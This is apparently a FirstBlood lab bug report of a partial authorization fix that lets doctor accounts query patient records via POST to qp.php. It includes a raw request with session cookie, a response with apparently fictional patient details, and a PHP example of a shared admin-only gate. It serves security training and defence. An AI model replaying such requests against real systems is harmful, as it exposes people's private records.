FirstBlood-#510 New registered doctor account can query patient directly via POST https://a9381b5eb20c-0xconft.a.firstbloodhackers.com/drpanel/drapi/qp.php
This issue was discovered on FirstBlood v2

On 2021-10-25, 0xconft Level 5 reported:

Hi there,

I tested that a newly registered doctor account can still query patients by directly sending a request to the /drpanel/drapi/qp.php endpoint

PoC

POST /drpanel/drapi/qp.php HTTP/1.1
Host: a9381b5eb20c-0xconft.a.firstbloodhackers.com
Cookie: drps=8a449f4da6dc67c3c5edc5df5
Content-Length: 8
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://a9381b5eb20c-0xconft.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://a9381b5eb20c-0xconft.a.firstbloodhackers.com/drpanel/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

name=sea

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Oct 2021 22:17:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 228

Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>

Best Regards, 0xconft

P3 Medium

Endpoint: /drpanel/drapi/qp.php

Parameter: name

Payload: patient name


FirstBlood ID: 40
Vulnerability Type: Application/Business Logic

The endpoint qp.php used to respond to GET requests, and it should only allow administrators to query for patient information; however, the developers only fixed the bug partially, and it still allowed doctors to query for patient information. query.php is related to this file and in v1 allowed both doctors and admins, but query.php was fixed completely whereas qp.php was not.
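The root cause described above is a partial fix: two endpoints (query.php and qp.php) each carried their own copy of the authorization logic, and only one copy was corrected. The example below is an added illustration, not FirstBlood's own code, of the defensive pattern that prevents this class of regression: one shared admin-only gate that every patient-query entry point calls before it reads a parameter or touches the database, independent of whether the request arrives by GET or POST. The session store keyed by the drps cookie value, the role strings 'admin' and 'doctor', and the lookup callback are all assumptions made for the demonstration.

```php
<?php
// Added example, not FirstBlood's code. Shows a single authorization gate
// shared by every patient-query endpoint (e.g. query.php and qp.php), so a
// fix cannot land in one file and be missed in the other.
// Assumptions: sessions are keyed by the value of the drps cookie and carry
// a 'role' string; only 'admin' may query patient records.

declare(strict_types=1);

// Hypothetical session lookup: map the drps cookie to a stored role.
// A real deployment would consult the server-side session store instead.
function resolve_role(array $cookies, array $sessions): ?string
{
    $token = $cookies['drps'] ?? null;
    if ($token === null || !isset($sessions[$token])) {
        return null; // no valid session presented
    }
    return $sessions[$token]['role'] ?? null;
}

// The one gate both endpoints include. Deny-by-default: anything that is
// not an authenticated administrator is rejected.
function is_admin(?string $role): bool
{
    return $role === 'admin';
}

// Shared handler body for the patient-query endpoints. The HTTP method is
// irrelevant: the check runs before the 'name' parameter is even read.
function handle_patient_query(array $cookies, array $params, array $sessions, callable $lookup): array
{
    if (!is_admin(resolve_role($cookies, $sessions))) {
        return ['status' => 403, 'body' => 'Forbidden'];
    }

    $name = trim((string)($params['name'] ?? ''));
    if ($name === '') {
        return ['status' => 400, 'body' => 'Missing name'];
    }

    $rows = $lookup($name);

    // Escape every field so patient data cannot inject markup into the page.
    $fragments = array_map(
        fn(array $r): string => 'Name: ' . htmlspecialchars($r['name'], ENT_QUOTES, 'UTF-8')
            . '<br>DOB: ' . htmlspecialchars($r['dob'], ENT_QUOTES, 'UTF-8'),
        $rows
    );
    return ['status' => 200, 'body' => implode('<hr>', $fragments)];
}

// Constructed sample data for running this file locally.
$sessions = [
    'tok-admin'  => ['role' => 'admin'],
    'tok-doctor' => ['role' => 'doctor'],
];
$lookup = fn(string $name): array => [['name' => 'Example Patient', 'dob' => '01/01/70']];

// A doctor session replaying the report's POST (name=sea) is refused,
// while an administrator session with the same parameter is served.
$asDoctor = handle_patient_query(['drps' => 'tok-doctor'], ['name' => 'sea'], $sessions, $lookup);
$asAdmin  = handle_patient_query(['drps' => 'tok-admin'],  ['name' => 'sea'], $sessions, $lookup);
$noCookie = handle_patient_query([], ['name' => 'sea'], $sessions, $lookup);

echo 'doctor:   ', $asDoctor['status'], PHP_EOL;
echo 'admin:    ', $asAdmin['status'], PHP_EOL;
echo 'no-auth:  ', $noCookie['status'], PHP_EOL;
```

The design point is that query.php and qp.php would both call handle_patient_query (or at least is_admin) from one shared include, so a role change is made in exactly one place. When reviewing a fix for a reported authorization bug, grepping for every other file that reads the same session cookie and reaches the same tables is the quickest way to catch the sibling endpoint that was left behind.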